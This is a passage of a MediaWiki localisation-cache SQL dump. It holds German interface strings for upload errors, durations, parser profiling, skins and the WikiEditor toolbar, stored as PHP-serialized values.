API\";'),('de','messages:feedback-thanks','s:78:\"Vielen Dank. Deine Rückmeldung wurde auf der Seite „[$2 $1]“ gespeichert.\";'),('de','messages:feedback-close','s:8:\"Erledigt\";'),('de','messages:feedback-bugcheck','s:103:\"Super! Bitte überprüfe noch, ob es sich hierbei nicht um einen bereits [$1 bekannten Fehler] handelt.\";'),('de','messages:feedback-bugnew','s:49:\"Ich habe es überprüft. Den neuen Fehler melden.\";'),('de','messages:searchsuggest-search','s:6:\"Suchen\";'),('de','messages:searchsuggest-containing','s:12:\"enthält …\";'),('de','messages:api-error-badaccess-groups','s:66:\"Du hast nicht die Berechtigung Dateien in dieses Wiki hochzuladen.\";'),('de','messages:api-error-badtoken','s:42:\"Interner Fehler: Der Token ist fehlerhaft.\";'),('de','messages:api-error-copyuploaddisabled','s:58:\"Das Hochladen via URL wurde auf diesem Server deaktiviert.\";'),('de','messages:api-error-duplicate','s:106:\"Es gibt im Wiki bereits {{PLURAL:$1|[$2 eine andere Datei]|[$2 mehrere andere Dateien]}} gleichen Inhalts.\";'),('de','messages:api-error-duplicate-archive','s:165:\"Es {{PLURAL:$1|war bereits [$2 andere Datei]|waren bereits [$2 andere Dateien]}} gleichen Inhalts vorhanden. {{PLURAL:$1|Sie wurde|Sie wurden}} allerdings gelöscht.\";'),('de','messages:api-error-duplicate-archive-popup-title','s:95:\"Doppelte {{PLURAL:$1|Datei, die bereits gelöscht wurde|Dateien, die bereits gelöscht wurden}}\";'),('de','messages:api-error-duplicate-popup-title','s:46:\"Doppelt vorhandene {{PLURAL:$1|Datei|Dateien}}\";'),('de','messages:api-error-empty-file','s:32:\"Die hochgeladene Datei war leer.\";'),('de','messages:api-error-emptypage','s:53:\"Es ist nicht erlaubt, neue leere Seiten zu erstellen.\";'),('de','messages:api-error-fetchfileerror','s:67:\"Interner Fehler: Beim Abrufen der Datei ist ein Fehler aufgetreten.\";'),('de','messages:api-error-fileexists-forbidden','s:86:\"Eine Datei namens „$1“ ist bereits vorhanden und kann nicht überschrieben werden.\";'),('de','messages:api-error-fileexists-shared-forbidden','s:125:\"Eine Datei namens „$1“ ist bereits im gemeinsamen Dateirepositorium vorhanden und kann daher nicht überschrieben werden.\";'),('de','messages:api-error-file-too-large','s:36:\"Die hochgeladene Datei war zu groß.\";'),('de','messages:api-error-filename-tooshort','s:26:\"Der Dateiname ist zu kurz.\";'),('de','messages:api-error-filetype-banned','s:31:\"Diese Dateiendung ist gesperrt.\";'),('de','messages:api-error-filetype-banned-type','s:159:\"$1 {{PLURAL:$4|ist ein nicht zulässiger Dateityp|sind nicht zulässige Dateitypen}}. {{PLURAL:$3|Ein zulässiger Dateityp ist|Zulässige Dateitypen sind}} $2.\";'),('de','messages:api-error-filetype-missing','s:46:\"Die hochzuladende Datei hat keine Dateiendung.\";'),('de','messages:api-error-hookaborted','s:95:\"Der Versuch, die Änderung durchzuführen, wurde von einer Parsererweiterung (API) abgebrochen.\";'),('de','messages:api-error-http','s:74:\"Interner Fehler: Es konnte keine Verbindung zum Server hergestellt werden.\";'),('de','messages:api-error-illegal-filename','s:32:\"Der Dateiname ist nicht erlaubt.\";'),('de','messages:api-error-internal-error','s:90:\"Interner Fehler: Ein unbekannter Fehler ist beim Hochladen der Datei ins Wiki aufgetreten.\";'),('de','messages:api-error-invalid-file-key','s:72:\"Interner Fehler: Die Datei wurde nicht im temporären Speicher gefunden.\";'),('de','messages:api-error-missingparam','s:46:\"Interner Fehler: Der Anfrage fehlen Parameter.\";'),('de','messages:api-error-missingresult','s:86:\"Interner Fehler: Es konnte nicht festgestellt werden, ob das Kopieren erfolgreich war.\";'),('de','messages:api-error-mustbeloggedin','s:58:\"Um Dateien hochladen zu können, musst du angemeldet sein.\";'),('de','messages:api-error-mustbeposted','s:77:\"Es liegt ein Programmfehler vor (es wird die falsche HTTP-Methode verwendet).\";'),('de','messages:api-error-noimageinfo','s:91:\"Das Hochladen war erfolgreich, aber der Server kann keine Informationen zur Datei anzeigen.\";'),('de','messages:api-error-nomodule','s:62:\"Interner Fehler: Es wurde kein Modul zum Hochladen festgelegt.\";'),('de','messages:api-error-ok-but-empty','s:43:\"Interner Fehler: Der Server reagiert nicht.\";'),('de','messages:api-error-overwrite','s:61:\"Das Überschreiben einer vorhandenen Datei ist nicht erlaubt.\";'),('de','messages:api-error-stashfailed','s:68:\"Interner Fehler: Der Server konnte keine temporäre Datei speichern.\";'),('de','messages:api-error-publishfailed','s:79:\"Interner Fehler: Der Server konnte die temporäre Datei nicht veröffentlichen.\";'),('de','messages:api-error-stasherror','s:45:\"Beim Hochladen der Datei gab es einen Fehler.\";'),('de','messages:api-error-timeout','s:60:\"Der Server hat nicht innerhalb der erwarteten Zeit reagiert.\";'),('de','messages:api-error-unclassified','s:39:\"Ein unbekannter Fehler ist aufgetreten.\";'),('de','messages:api-error-unknown-code','s:28:\"Unbekannter Fehler: „$1“\";'),('de','messages:api-error-unknown-error','s:81:\"Interner Fehler: Ein unbekannter Fehler ist beim Hochladen der Datei aufgetreten.\";'),('de','messages:api-error-unknown-warning','s:22:\"Unbekannte Warnung: $1\";'),('de','messages:api-error-unknownerror','s:28:\"Unbekannter Fehler: „$1“\";'),('de','messages:api-error-uploaddisabled','s:45:\"Das Hochladen ist in diesem Wiki deaktiviert.\";'),('de','messages:api-error-verification-error','s:86:\"Die hochzuladende Datei ist entweder fehlerhaft oder hat keine Dateinamenserweiterung.\";'),('de','messages:duration-seconds','s:33:\"$1 {{PLURAL:$1|Sekunde|Sekunden}}\";'),('de','messages:duration-minutes','s:31:\"$1 {{PLURAL:$1|Minute|Minuten}}\";'),('de','messages:duration-hours','s:31:\"$1 {{PLURAL:$1|Stunde|Stunden}}\";'),('de','messages:duration-days','s:25:\"$1 {{PLURAL:$1|Tag|Tage}}\";'),('de','messages:duration-weeks','s:29:\"$1 {{PLURAL:$1|Woche|Wochen}}\";'),('de','messages:duration-years','s:27:\"$1 {{PLURAL:$1|Jahr|Jahre}}\";'),('de','messages:duration-decades','s:37:\"$1 {{PLURAL:$1|Jahrzehnt|Jahrzehnte}}\";'),('de','messages:duration-centuries','s:41:\"$1 {{PLURAL:$1|Jahrhundert|Jahrhunderte}}\";'),('de','messages:duration-millennia','s:41:\"$1 {{PLURAL:$1|Jahrtausend|Jahrtausende}}\";'),('de','messages:rotate-comment','s:54:\"Bild um $1 {{PLURAL:$1|Grad}} im Uhrzeigersinn gedreht\";'),('de','messages:limitreport-title','s:27:\"Profilingdaten des Parsers:\";'),('de','messages:limitreport-cputime','s:16:\"CPU-Zeit-Nutzung\";'),('de','messages:limitreport-cputime-value','s:38:\"{{PLURAL:$1|Eine Sekunde|$1 Sekunden}}\";'),('de','messages:limitreport-walltime','s:15:\"Echtzeitnutzung\";'),('de','messages:limitreport-walltime-value','s:38:\"{{PLURAL:$1|Eine Sekunde|$1 Sekunden}}\";'),('de','messages:limitreport-ppvisitednodes','s:40:\"Besuchte Knotenanzahl des Präprozessors\";'),('de','messages:limitreport-ppvisitednodes-value','s:5:\"$1/$2\";'),('de','messages:limitreport-ppgeneratednodes','s:40:\"Erzeugte Knotenanzahl des Präprozessors\";'),('de','messages:limitreport-ppgeneratednodes-value','s:5:\"$1/$2\";'),('de','messages:limitreport-postexpandincludesize','s:39:\"Einbindungsgröße nach dem Expandieren\";'),('de','messages:limitreport-postexpandincludesize-value','s:30:\"$1/$2 {{PLURAL:$2|Byte|Bytes}}\";'),('de','messages:limitreport-templateargumentsize','s:23:\"Vorlagenargumentgröße\";'),('de','messages:limitreport-templateargumentsize-value','s:30:\"$1/$2 {{PLURAL:$2|Byte|Bytes}}\";'),('de','messages:limitreport-expansiondepth','s:24:\"Höchste Expansionstiefe\";'),('de','messages:limitreport-expansiondepth-value','s:5:\"$1/$2\";'),('de','messages:limitreport-expensivefunctioncount','s:36:\"Anzahl aufwändiger Parserfunktionen\";'),('de','messages:expandtemplates','s:20:\"Vorlagen expandieren\";'),('de','messages:expand_templates_intro','s:341:\"Auf dieser Spezialseite kann Text eingegeben werden. Alle enthaltenen Vorlagen werden dabei rekursiv expandiert.\nAuch Parserfunktionen wie\n{{#language:…}} und Variablen wie\n{{CURRENTDAY}} werden ausgewertet –\nfaktisch alles was in doppelten geschweiften Klammern enthalten ist.\";'),('de','messages:expand_templates_title','s:50:\"Kontexttitel für beispielsweise {{FULLPAGENAME}}:\";'),('de','messages:expand_templates_input','s:12:\"Eingabefeld:\";'),('de','messages:expand_templates_output','s:8:\"Ergebnis\";'),('de','messages:expand_templates_xml_output','s:11:\"XML-Ausgabe\";'),('de','messages:expand_templates_html_output','s:16:\"Roh-HTML-Ausgabe\";'),('de','messages:expand_templates_ok','s:19:\"Vorlage expandieren\";'),('de','messages:expand_templates_remove_comments','s:20:\"Kommentare entfernen\";'),('de','messages:expand_templates_remove_nowiki','s:42:\"-Tags in der Ausgabe unterdrücken\";'),('de','messages:expand_templates_generate_xml','s:22:\"XML-Parser-Baum zeigen\";'),('de','messages:expand_templates_generate_rawhtml','s:19:\"Rohes HTML anzeigen\";'),('de','messages:expand_templates_preview','s:8:\"Vorschau\";'),('de','messages:pagelanguage','s:21:\"Seitensprachenauswahl\";'),('de','messages:pagelang-name','s:5:\"Seite\";'),('de','messages:pagelang-language','s:7:\"Sprache\";'),('de','messages:pagelang-use-default','s:25:\"Standardsprache verwenden\";'),('de','messages:pagelang-select-lang','s:18:\"Sprache auswählen\";'),('de','messages:right-pagelang','s:21:\"Seitensprache ändern\";'),('de','messages:action-pagelang','s:28:\"die Seitensprache zu ändern\";'),('de','messages:log-name-pagelang','s:26:\"Sprachenänderungs-Logbuch\";'),('de','messages:log-description-pagelang','s:55:\"Dies ist ein Logbuch mit Änderungen an Seitensprachen.\";'),('de','messages:logentry-pagelang-pagelang','s:67:\"$1 {{GENDER:$2|änderte}} die Seitensprache für $3 von $4 nach $5.\";'),('de','messages:default-skin-not-found','s:1726:\"Hoppla! Die in $wgDefaultSkin als $1 definierte Standardbenutzeroberfläche für dein Wiki ist nicht verfügbar.\n\nDeine Installation scheint die folgenden Benutzeroberflächen zu enthalten. Siehe [https://www.mediawiki.org/wiki/Manual:Skin_configuration/de das Benutzerhandbuch] zur Aktivierung und Auswahl des Standards.\n\n$2\n\n; Falls du gerade MediaWiki installiert hast:\n: Du hast vermutlich von Git oder direkt vom Quellcode mithilfe einer anderen Methode installiert. Dies wird erwartet. Versuche einige Benutzeroberflächen aus dem [https://www.mediawiki.org/wiki/Category:All_skins MediaWiki.org-Benutzeroberflächenverzeichnis] zu installieren, indem du:\n:* Den [https://www.mediawiki.org/wiki/Download/de Tarball-Installer] herunterlädst, der mit verschiedenen Benutzeroberflächen und Erweiterungen kommt. Du kannst das Verzeichnis skins/ kopieren und einfügen.\n:* Eine der mediawiki/skins/*-Repositorien über Git in das skins/-Verzeichnis deiner MediaWiki-Installation klonst.\n: Dies sollte nicht dein Git-Repositorium beeinträchtigen, falls du ein MediaWiki-Entwickler bist.\n\n; Falls du gerade MediaWiki aktualisiert hast:\n: MediaWiki 1.24 und neuere Versionen aktivieren nicht mehr automatisch installierte Benutzeroberflächen (siehe das [https://www.mediawiki.org/wiki/Manual:Skin_autodiscovery Benutzerhandbuch]). Du kannst die folgenden Zeilen in die Datei LocalSettings.php einfügen, um alle derzeit installierten Benutzeroberflächen zu aktivieren:\n\n
                                                                $3
                                                                \n\n; Falls du gerade LocalSettings.php geändert hast:\n: Überprüfe die Namen der Benutzeroberflächen auf Tippfehler.\";'),('de','messages:default-skin-not-found-no-skins','s:1274:\"Hoppla! Die in $wgDefaultSkin als $1 definierte Standardbenutzeroberfläche für dein Wiki ist nicht verfügbar.\n\nDu hast keine installierten Benutzeroberflächen.\n\n; Falls du gerade MediaWiki installiert oder aktualisiert hast:\n: Du hast vermutlich von Git oder direkt vom Quellcode mithilfe einer anderen Methode installiert. Dies wird erwartet. MediaWiki 1.24 und neuere Versionen enthalten keine Benutzeroberflächen im Haupt-Repositorium. Versuche einige Benutzeroberflächen aus dem [https://www.mediawiki.org/wiki/Category:All_skins MediaWiki.org-Benutzeroberflächenverzeichnis] zu installieren, indem du:\n:* Den [https://www.mediawiki.org/wiki/Download/de Tarball-Installer] herunterlädst, der mit verschiedenen Benutzeroberflächen und Erweiterungen kommt. Du kannst das skins/-Verzeichnis kopieren und einfügen.\n:* Eine der mediawiki/skins/*-Repositorien über Git in das skins/-Verzeichnis deiner MediaWiki-Installation klonst.\n: Dies sollte nicht dein Git-Repositorium beeinträchtigen, falls du ein MediaWiki-Entwickler bist. Siehe das [https://www.mediawiki.org/wiki/Manual:Skin_configuration/de Benutzerhandbuch] zur Aktivierung von Benutzeroberflächen und Auswahl des Standards.\";'),('de','messages:default-skin-not-found-row-enabled','s:34:\"* $1 / $2 (aktiviert)\";'),('de','messages:default-skin-not-found-row-disabled','s:42:\"* $1 / $2 (\'\'\'deaktiviert\'\'\')\";'),('de','messages:mediastatistics','s:17:\"Medienstatistiken\";'),('de','messages:mediastatistics-summary','s:155:\"Statistiken über hochgeladene Dateitypen. Dies beinhaltet nur die aktuellste Version einer Datei. Alte oder gelöschte Dateiversionen sind ausgeschlossen.\";'),('de','messages:mediastatistics-nbytes','s:41:\"{{PLURAL:$1|Ein Byte|$1 Bytes}} ($2; $3%)\";'),('de','messages:mediastatistics-table-mimetype','s:8:\"MIME-Typ\";'),('de','messages:mediastatistics-table-extensions','s:23:\"Mögliche Erweiterungen\";'),('de','messages:mediastatistics-table-count','s:18:\"Anzahl der Dateien\";'),('de','messages:mediastatistics-table-totalbytes','s:13:\"Gesamtgröße\";'),('de','messages:mediastatistics-header-unknown','s:9:\"Unbekannt\";'),('de','messages:mediastatistics-header-bitmap','s:13:\"Bitmap-Bilder\";'),('de','messages:mediastatistics-header-drawing','s:26:\"Zeichnungen (Vektorbilder)\";'),('de','messages:mediastatistics-header-audio','s:5:\"Audio\";'),('de','messages:mediastatistics-header-video','s:6:\"Videos\";'),('de','messages:mediastatistics-header-multimedia','s:10:\"Rich Media\";'),('de','messages:mediastatistics-header-office','s:6:\"Office\";'),('de','messages:mediastatistics-header-text','s:4:\"Text\";'),('de','messages:mediastatistics-header-executable','s:20:\"Ausführbare Dateien\";'),('de','messages:mediastatistics-header-archive','s:20:\"Komprimierte Formate\";'),('de','messages:ooui-outline-control-move-down','s:30:\"Element nach unten verschieben\";'),('de','messages:ooui-outline-control-move-up','s:29:\"Element nach oben verschieben\";'),('de','messages:ooui-outline-control-remove','s:17:\"Element entfernen\";'),('de','messages:ooui-toolbar-more','s:4:\"Mehr\";'),('de','messages:ooui-dialog-message-accept','s:4:\"Okay\";'),('de','messages:ooui-dialog-message-reject','s:9:\"Abbrechen\";'),('de','messages:ooui-dialog-process-error','s:25:\"Etwas ist schief gelaufen\";'),('de','messages:ooui-dialog-process-dismiss','s:10:\"Ausblenden\";'),('de','messages:ooui-dialog-process-retry','s:16:\"Erneut versuchen\";'),('de','messages:cologneblue.css','s:89:\"/* Das folgende CSS wird für Benutzer der Kölnisch-Blau-Benutzeroberfläche geladen. */\";'),('de','messages:cologneblue.js','s:96:\"/* Das folgende JavaScript wird für Benutzer der Kölnisch-Blau-Benutzeroberfläche geladen. */\";'),('de','messages:skinname-cologneblue','s:14:\"Kölnisch Blau\";'),('de','messages:cologneblue-desc','s:68:\"Eine leichtgewichtige Benutzeroberfläche mit minimaler Formatierung\";'),('de','messages:modern.css','s:81:\"/* Das folgende CSS wird für Benutzer der Modern-Benutzeroberfläche geladen. */\";'),('de','messages:modern.js','s:88:\"/* Das folgende JavaScript wird für Benutzer der Modern-Benutzeroberfläche geladen. */\";'),('de','messages:skinname-modern','s:6:\"Modern\";'),('de','messages:modern-desc','s:79:\"Ein Thema in blau und grau mit Seiten- und Kopfleiste. Abgeleitet von MonoBook.\";'),('de','messages:skinname-monobook','s:8:\"MonoBook\";'),('de','messages:monobook-desc','s:132:\"Ergänzt die klassische MediaWiki-Benutzeroberfläche seit 2004, benannt nach dem Schwarzweißfoto eines Buches im Seitenhintergrund\";'),('de','messages:monobook.css','s:82:\"/* Das folgende CSS wird für Benutzer der MonoBook-Benutzeroberfläche geladen */\";'),('de','messages:monobook.js','s:90:\"/* Das folgende JavaScript wird für Benutzer der Monobook-Benutzeroberfläche geladen. */\";'),('de','messages:skinname-vector','s:6:\"Vector\";'),('de','messages:vector-skin-desc','s:106:\"Moderne Version von Monobook mit frischem Aussehen und vielen Verbesserungen an der Benutzerfreundlichkeit\";'),('de','messages:vector.css','s:81:\"/* Das folgende CSS wird für Benutzer der Vector-Benutzeroberfläche geladen. */\";'),('de','messages:vector.js','s:88:\"/* Das folgende JavaScript wird für Benutzer der Vector-Benutzeroberfläche geladen. */\";'),('de','messages:vector-action-addsection','s:21:\"Abschnitt hinzufügen\";'),('de','messages:vector-action-delete','s:8:\"Löschen\";'),('de','messages:vector-action-move','s:11:\"Verschieben\";'),('de','messages:vector-action-protect','s:9:\"Schützen\";'),('de','messages:vector-action-undelete','s:16:\"Wiederherstellen\";'),('de','messages:vector-action-unprotect','s:20:\"Seitenschutz ändern\";'),('de','messages:vector-view-create','s:9:\"Erstellen\";'),('de','messages:vector-view-edit','s:10:\"Bearbeiten\";'),('de','messages:vector-view-history','s:18:\"Versionsgeschichte\";'),('de','messages:vector-view-view','s:5:\"Lesen\";'),('de','messages:vector-view-viewsource','s:18:\"Quelltext anzeigen\";'),('de','messages:vector-more-actions','s:4:\"Mehr\";'),('de','messages:wikieditor','s:33:\"Fortgeschrittener Wikitext-Editor\";'),('de','messages:wikieditor-desc','s:102:\"Ermöglicht eine erweiterbare Oberfläche zur Wikitext-Bearbeitung sowie viele weitere neue Funktionen\";'),('de','messages:wikieditor-wikitext-tab','s:8:\"Wikitext\";'),('de','messages:wikieditor-loading','s:8:\"Lade …\";'),('de','messages:wikieditor-preview-preference','s:40:\"Gegenüberstellungsvorschau ermöglichen\";'),('de','messages:wikieditor-preview-tab','s:8:\"Vorschau\";'),('de','messages:wikieditor-preview-changes-tab','s:11:\"Änderungen\";'),('de','messages:wikieditor-preview-loading','s:8:\"Lade …\";'),('de','messages:wikieditor-previewDialog-preference','s:34:\"Aktiviere die Abfrage zur Vorschau\";'),('de','messages:wikieditor-previewDialog-tab','s:8:\"Vorschau\";'),('de','messages:wikieditor-previewDialog-loading','s:8:\"Lade …\";'),('de','messages:wikieditor-publish-preference','s:51:\"Schritt-für-Schritt-Veröffentlichung ermöglichen\";'),('de','messages:wikieditor-publish-button-publish','s:16:\"Veröffentlichen\";'),('de','messages:wikieditor-publish-button-cancel','s:9:\"Abbrechen\";'),('de','messages:wikieditor-publish-dialog-title','s:33:\"Auf {{SITENAME}} veröffentlichen\";'),('de','messages:wikieditor-publish-dialog-summary','s:75:\"Zusammenfassung (kurze Beschreibung der von dir vorgenommenen Änderungen):\";'),('de','messages:wikieditor-publish-dialog-minor','s:16:\"Kleine Änderung\";'),('de','messages:wikieditor-publish-dialog-watch','s:22:\"Diese Seite beobachten\";'),('de','messages:wikieditor-publish-dialog-publish','s:16:\"Veröffentlichen\";'),('de','messages:wikieditor-publish-dialog-goback','s:7:\"Zurück\";'),('de','messages:wikieditor-toolbar','s:25:\"Bearbeiten-Werkzeugleiste\";'),('de','messages:wikieditor-toolbar-desc','s:65:\"Bearbeiten-Werkzeugleiste mit verbesserter Benutzerfreundlichkeit\";'),('de','messages:wikieditor-toolbar-preference','s:47:\"Erweiterte Bearbeiten-Werkzeugleiste aktivieren\";'),('de','messages:wikieditor-toolbar-dialogs-preference','s:104:\"Assistenten zum Einfügen von Links und Tabellen sowie die Funktion „Suchen und Ersetzen“ aktivieren\";'),('de','messages:wikieditor-toolbar-hidesig','s:78:\"Die Schaltfläche für die Signatur bei Seiten im Artikelnamensraum ausblenden\";'),('de','messages:wikieditor-toolbar-loading','s:8:\"Lade …\";'),('de','messages:wikieditor-toolbar-tool-bold','s:4:\"Fett\";'),('de','messages:wikieditor-toolbar-tool-bold-example','s:11:\"Fetter Text\";'),('de','messages:wikieditor-toolbar-tool-italic','s:6:\"Kursiv\";'),('de','messages:wikieditor-toolbar-tool-italic-example','s:13:\"Kursiver Text\";'),('de','messages:wikieditor-toolbar-tool-ilink','s:13:\"Interner Link\";'),('de','messages:wikieditor-toolbar-tool-ilink-example','s:9:\"Linktitel\";'),('de','messages:wikieditor-toolbar-tool-xlink','s:32:\"Externer Link (http:// beachten)\";'),('de','messages:wikieditor-toolbar-tool-xlink-example','s:41:\"http://www.example.org Text für den Link\";'),('de','messages:wikieditor-toolbar-tool-link','s:4:\"Link\";'),('de','messages:wikieditor-toolbar-tool-link-title','s:14:\"Link einfügen\";'),('de','messages:wikieditor-toolbar-tool-link-int','s:18:\"Zu einer Wikiseite\";'),('de','messages:wikieditor-toolbar-tool-link-int-target','s:19:\"Zielseite oder URL:\";'),('de','messages:wikieditor-toolbar-tool-link-int-target-tooltip','s:32:\"Der Titel oder die URL der Seite\";'),('de','messages:wikieditor-toolbar-tool-link-int-text','s:40:\"Anzuzeigender Text / Text für den Link:\";'),('de','messages:wikieditor-toolbar-tool-link-int-text-tooltip','s:35:\"Der Text, der angezeigt werden soll\";'),('de','messages:wikieditor-toolbar-tool-link-ext','s:31:\"Zu einer externen Internetseite\";'),('de','messages:wikieditor-toolbar-tool-link-ext-target','s:14:\"URL des Links:\";'),('de','messages:wikieditor-toolbar-tool-link-ext-text','s:16:\"Linkbezeichnung:\";'),('de','messages:wikieditor-toolbar-tool-link-insert','s:14:\"Link einfügen\";'),('de','messages:wikieditor-toolbar-tool-link-cancel','s:9:\"Abbrechen\";'),('de','messages:wikieditor-toolbar-tool-link-int-target-status-exists','s:23:\"Seite bereits vorhanden\";'),('de','messages:wikieditor-toolbar-tool-link-int-target-status-notexists','s:21:\"Seite existiert nicht\";'),('de','messages:wikieditor-toolbar-tool-link-int-target-status-invalid','s:17:\"Ungültiger Titel\";'),('de','messages:wikieditor-toolbar-tool-link-int-target-status-external','s:13:\"Externer Link\";'),('de','messages:wikieditor-toolbar-tool-link-int-target-status-loading','s:34:\"Prüfe, ob Seite vorhanden ist …\";'),('de','messages:wikieditor-toolbar-tool-link-int-target-status-disambig','s:22:\"Begriffsklärungsseite\";'),('de','messages:wikieditor-toolbar-tool-link-int-invalid','s:40:\"Der angegebene Seitenname ist ungültig.\";'),('de','messages:wikieditor-toolbar-tool-link-lookslikeinternal','s:138:\"Die von dir angegebene URL wirkt wie eine, die auf eine andere Wikiseite verlinken würde.\nMöchtest du daraus einen internen Link machen?\";'),('de','messages:wikieditor-toolbar-tool-link-lookslikeinternal-int','s:13:\"Interner Link\";'),('de','messages:wikieditor-toolbar-tool-link-lookslikeinternal-ext','s:13:\"Externer Link\";'),('de','messages:wikieditor-toolbar-tool-link-empty','s:39:\"Du hast nichts zum Verlinken angegeben.\";'),('de','messages:wikieditor-toolbar-tool-file','s:18:\"Eingebettete Datei\";'),('de','messages:wikieditor-toolbar-tool-file-example','s:12:\"Beispiel.jpg\";'),('de','messages:wikieditor-toolbar-tool-file-title','s:15:\"Datei einfügen\";'),('de','messages:wikieditor-toolbar-file-target','s:10:\"Dateiname:\";'),('de','messages:wikieditor-toolbar-file-caption','s:8:\"Legende:\";'),('de','messages:wikieditor-toolbar-file-size','s:8:\"Größe:\";'),('de','messages:wikieditor-toolbar-file-float','s:12:\"Ausrichtung:\";'),('de','messages:wikieditor-toolbar-file-default','s:10:\"(Standard)\";'),('de','messages:wikieditor-toolbar-file-format','s:7:\"Format:\";'),('de','messages:wikieditor-toolbar-file-format-none','s:5:\"keine\";'),('de','messages:wikieditor-toolbar-tool-file-insert','s:9:\"Einfügen\";'),('de','messages:wikieditor-toolbar-tool-file-cancel','s:9:\"Abbrechen\";'),('de','messages:wikieditor-toolbar-tool-reference','s:13:\"Quellenangabe\";'),('de','messages:wikieditor-toolbar-tool-reference-example','s:31:\"Hier den Fußnotentext eingeben\";'),('de','messages:wikieditor-toolbar-tool-reference-cancel','s:9:\"Abbrechen\";'),('de','messages:wikieditor-toolbar-tool-reference-title','s:24:\"Einzelnachweis einfügen\";'),('de','messages:wikieditor-toolbar-tool-reference-insert','s:9:\"Einfügen\";'),('de','messages:wikieditor-toolbar-tool-reference-text','s:25:\"Text des Einzelnachweises\";'),('de','messages:wikieditor-toolbar-tool-signature','s:24:\"Signatur und Zeitstempel\";'),('de','messages:wikieditor-toolbar-section-advanced','s:9:\"Erweitert\";'),('de','messages:wikieditor-toolbar-tool-heading','s:12:\"Überschrift\";'),('de','messages:wikieditor-toolbar-tool-heading-1','s:7:\"Ebene 1\";'),('de','messages:wikieditor-toolbar-tool-heading-2','s:7:\"Ebene 2\";'),('de','messages:wikieditor-toolbar-tool-heading-3','s:7:\"Ebene 3\";'),('de','messages:wikieditor-toolbar-tool-heading-4','s:7:\"Ebene 4\";'),('de','messages:wikieditor-toolbar-tool-heading-5','s:7:\"Ebene 5\";'),('de','messages:wikieditor-toolbar-tool-heading-example','s:9:\"Kopfzeile\";'),('de','messages:wikieditor-toolbar-group-format','s:6:\"Format\";'),('de','messages:wikieditor-toolbar-tool-ulist','s:18:\"Aufgezählte Liste\";'),('de','messages:wikieditor-toolbar-tool-ulist-example','s:27:\"Aufgezählter Listeneintrag\";'),('de','messages:wikieditor-toolbar-tool-olist','s:17:\"Nummerierte Liste\";'),('de','messages:wikieditor-toolbar-tool-olist-example','s:26:\"Nummerierter Listeneintrag\";'),('de','messages:wikieditor-toolbar-tool-nowiki','s:22:\"Keine Wikiformatierung\";'),('de','messages:wikieditor-toolbar-tool-nowiki-example','s:37:\"Hier den unformatierten Text eingeben\";'),('de','messages:wikieditor-toolbar-tool-redirect','s:13:\"Weiterleitung\";'),('de','messages:wikieditor-toolbar-tool-redirect-example','s:18:\"Name der Zielseite\";'),('de','messages:wikieditor-toolbar-tool-big','s:5:\"Groß\";'),('de','messages:wikieditor-toolbar-tool-big-example','s:12:\"Großer Text\";'),('de','messages:wikieditor-toolbar-tool-small','s:5:\"Klein\";'),('de','messages:wikieditor-toolbar-tool-small-example','s:12:\"Kleiner Text\";'),('de','messages:wikieditor-toolbar-tool-superscript','s:12:\"Hochgestellt\";'),('de','messages:wikieditor-toolbar-tool-superscript-example','s:19:\"Hochgestellter Text\";'),('de','messages:wikieditor-toolbar-tool-subscript','s:12:\"Tiefgestellt\";'),('de','messages:wikieditor-toolbar-tool-subscript-example','s:19:\"Tiefgestellter Text\";'),('de','messages:wikieditor-toolbar-group-insert','s:9:\"Einfügen\";'),('de','messages:wikieditor-toolbar-tool-gallery','s:13:\"Bildergalerie\";'),('de','messages:wikieditor-toolbar-tool-gallery-example','s:53:\"Beispiel.jpg|Beschreibung1\nBeispiel.jpg|Beschreibung2\";'),('de','messages:wikieditor-toolbar-tool-newline','s:55:\"Zeilenumbruch erzwingen (nicht im Fließtext verwenden)\";'),('de','messages:wikieditor-toolbar-tool-table','s:7:\"Tabelle\";'),('de','messages:wikieditor-toolbar-tool-table-example-old','s:172:\"-\n! Überschrift 1\n! Überschrift 2\n! Überschrift 3\n|-\n| Zeile 1, Zelle 1\n| Zeile 1, Zelle 2\n| Zeile 1, Zelle 3\n|-\n| Zeile 2, Zelle 1\n| Zeile 2, Zelle 2\n| Zeile 2, Zelle 3\";'),('de','messages:wikieditor-toolbar-tool-table-example-cell-text','s:10:\"Zellentext\";'),('de','messages:wikieditor-toolbar-tool-table-example-header','s:12:\"Überschrift\";'),('de','messages:wikieditor-toolbar-tool-table-title','s:17:\"Tabelle einfügen\";'),('de','messages:wikieditor-toolbar-tool-table-dimensions-rows','s:6:\"Zeilen\";'),('de','messages:wikieditor-toolbar-tool-table-dimensions-columns','s:7:\"Spalten\";'),('de','messages:wikieditor-toolbar-tool-table-dimensions-header','s:13:\"mit Kopfzeile\";'),('de','messages:wikieditor-toolbar-tool-table-wikitable','s:10:\"mit Rahmen\";'),('de','messages:wikieditor-toolbar-tool-table-sortable','s:25:\"Tabelle sortierbar machen\";'),('de','messages:wikieditor-toolbar-tool-table-example','s:8:\"Beispiel\";'),('de','messages:wikieditor-toolbar-tool-table-preview','s:8:\"Vorschau\";'),('de','messages:wikieditor-toolbar-tool-table-insert','s:9:\"Einfügen\";'),('de','messages:wikieditor-toolbar-tool-table-cancel','s:9:\"Abbrechen\";'),('de','messages:wikieditor-toolbar-tool-table-toomany','s:90:\"Das Einfügen einer Tabelle mit mehr als 1000 Zellen ist mit diesem Dialog nicht möglich.\";'),('de','messages:wikieditor-toolbar-tool-table-invalidnumber','s:64:\"Du hast keine gültige Anzahl von Zeilen oder Spalten angegeben.\";'),('de','messages:wikieditor-toolbar-tool-table-zero','s:69:\"Du kannst keine Tabelle einfügen, die weder Zeilen noch Spalten hat.\";'),('de','messages:wikieditor-toolbar-tool-replace','s:19:\"Suchen und Ersetzen\";'),('de','messages:wikieditor-toolbar-tool-replace-title','s:19:\"Suchen und Ersetzen\";'),('de','messages:wikieditor-toolbar-tool-replace-search','s:11:\"Suche nach:\";'),('de','messages:wikieditor-toolbar-tool-replace-replace','s:14:\"Ersetze durch:\";'),('de','messages:wikieditor-toolbar-tool-replace-case','s:35:\"Groß- und Kleinschreibung beachten\";'),('de','messages:wikieditor-toolbar-tool-replace-regex','s:60:\"Die Zeichenkette der Suche als regulären Ausdruck behandeln\";'),('de','messages:wikieditor-toolbar-tool-replace-button-findnext','s:15:\"Nächste finden\";'),('de','messages:wikieditor-toolbar-tool-replace-button-replace','s:8:\"Ersetzen\";'),('de','messages:wikieditor-toolbar-tool-replace-button-replaceall','s:13:\"Alle 